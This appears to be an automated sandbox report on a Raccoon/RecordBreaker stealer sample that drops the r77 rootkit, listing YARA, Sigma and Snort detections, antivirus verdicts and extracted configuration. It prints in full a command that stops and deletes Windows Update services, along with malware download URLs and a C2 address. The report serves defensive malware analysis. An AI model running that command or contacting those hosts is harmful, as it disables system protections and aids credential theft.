00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15f31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16235:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16541:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1683d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16b39:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16e29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17135:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17425:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17705:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17a11:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
70.2.dllhost.exe.23bed180000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
34.0.GoogleUpdate.exe.f80000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
70.2.dllhost.exe.140000000.0.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x21987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
52.0.MfU3390p.exe.f20000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
69.2.audiodg.exe.1e0e69f0000.0.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
42.2.MfU3390p.exe.f20000.2.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
70.2.dllhost.exe.14001e0b0.1.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
38.2.NtjHIfvQ.exe.1010000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
38.2.NtjHIfvQ.exe.fe0000.1.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
70.2.dllhost.exe.23bed180000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
69.2.audiodg.exe.1e0e6c60000.1.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
52.2.MfU3390p.exe.f20000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
70.2.dllhost.exe.14001e0b0.1.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
69.2.audiodg.exe.1e0e6c60000.1.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
70.2.dllhost.exe.23bed1b0000.3.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
38.2.NtjHIfvQ.exe.1010000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Click to see the 17 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\LocalLow\1u8JL0XE.exe" , ParentImage: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe, ParentProcessId: 3064, ParentProcessName: 1u8JL0XE.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 1784, ProcessName: cmd.exe

Snort Signatures

ET TROJAN Win32/Agent.AETZ CnC Checkin - Source IP: 192.168.2.4 - Destination IP: 172.66.40.196

Timestamp:	192.168.2.4172.66.40.196496974432039616 01/04/23-16:48:18.137155
SID:	2039616
Source Port:	49697
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 109.107.173.210 - Destination IP: 192.168.2.4

Timestamp:	109.107.173.210192.168.2.480496952036955 01/04/23-16:47:23.522722
SID:	2036955
Source Port:	80
Destination Port:	49695
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin M1 - Source IP: 192.168.2.4 - Destination IP: 109.107.173.210

Timestamp:	192.168.2.4109.107.173.21049695802036934 01/04/23-16:47:23.441995
SID:	2036934
Source Port:	49695
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) - Source IP: 192.168.2.4 - Destination IP: 66.235.200.147

Timestamp:	192.168.2.466.235.200.14749696802043003 01/04/23-16:47:37.397562
SID:	2043003
Source Port:	49696
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) - Source IP: 192.168.2.4 - Destination IP: 109.107.173.210

Timestamp:	192.168.2.4109.107.173.21049695802043003 01/04/23-16:47:27.555819
SID:	2043003
Source Port:	49695
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.idpminic.org/aula/hiuhehufw.exe	Avira URL Cloud: Label: malware
Source: http://www.idpminic.org/aula/ofg7d45fsdfgg312.exe	Avira URL Cloud: Label: malware
Source: http://www.idpminic.org/aula/dmi1dfg7n.exe	Avira URL Cloud: Label: malware
Source: http://www.idpminic.org/aula/f429fjd4uf84u.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/AD.Nekark.cgoeo
Source: C:\Users\user\AppData\Local\Temp\7321.tmp	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Avira: detection malicious, Label: HEUR/AGEN.1213193
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Avira: detection malicious, Label: TR/Agent.xvjcn
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Avira: detection malicious, Label: TR/AD.Nekark.avjnn
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Avira: detection malicious, Label: TR/AD.Nekark.cgoeo

Multi AV Scanner detection for submitted file

Source: Installer.exe	ReversingLabs: Detection: 73%
Source: Installer.exe	Virustotal: Detection: 67%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\7321.tmp	ReversingLabs: Detection: 80%

Machine Learning detection for sample

Source: Installer.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Joe Sandbox ML: detected

Source: 55.2.dialer.exe.7ff6cf740000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 55.0.dialer.exe.7ff6cf740000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 55.0.dialer.exe.7ff6cf740000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 34.2.GoogleUpdate.exe.f80000.2.unpack	Avira: Label: TR/TDSS.Gen2

Source: 00000000.00000002.432046165.0000000000419000.00000002.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Raccoon {"C2 url": ["http://109.107.173.210/"], "Bot ID": "e73f27cb584c5e7186bc777bf0481f2f", "RC4_key1": "e73f27cb584c5e7186bc777bf0481f2f"}

Source: Installer.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.40.196:443 -> 192.168.2.4:50032 version: TLS 1.2

Source:	Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source:	Binary string: GoogleUpdate_unsigned.pdb source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000000.415884336.0000000000F81000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: GoogleUpdate.exe, 00000022.00000002.624884003.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.646049748.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, MfU3390p.exe, 0000002A.00000002.631428646.0000000000C20000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: NtjHIfvQ.exe, 00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, NtjHIfvQ.exe, 00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp, audiodg.exe, 00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp, audiodg.exe, 00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000037.00000000.485066902.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: dllhost.exe, 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000000.589427793.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000000.587739120.0000000140000000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F27236 FindFirstFileExW,	42_2_00F27236
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F27236 FindFirstFileExW,	52_2_00F27236
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7466D4 FindFirstFileExW,	55_2_00007FF6CF7466D4

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2530
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2530
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2530
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	1_2_00007FF738DC2530
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then sub rsp, 38h	1_2_00007FF738DBF1C0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then sub rsp, 38h	1_2_00007FF738DB81D0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC22E0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC22E0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC22E0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC22E0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC23A0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC23A0
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	1_2_00007FF738DC2490
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	1_2_00007FF738DB5530
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then sub rsp, 38h	1_2_00007FF738DBC000
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 4x nop then push r13	1_2_00007FF738DB8100

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039616 ET TROJAN Win32/Agent.AETZ CnC Checkin 192.168.2.4:49697 -> 172.66.40.196:443
Source: Traffic	Snort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.4:49695 -> 109.107.173.210:80
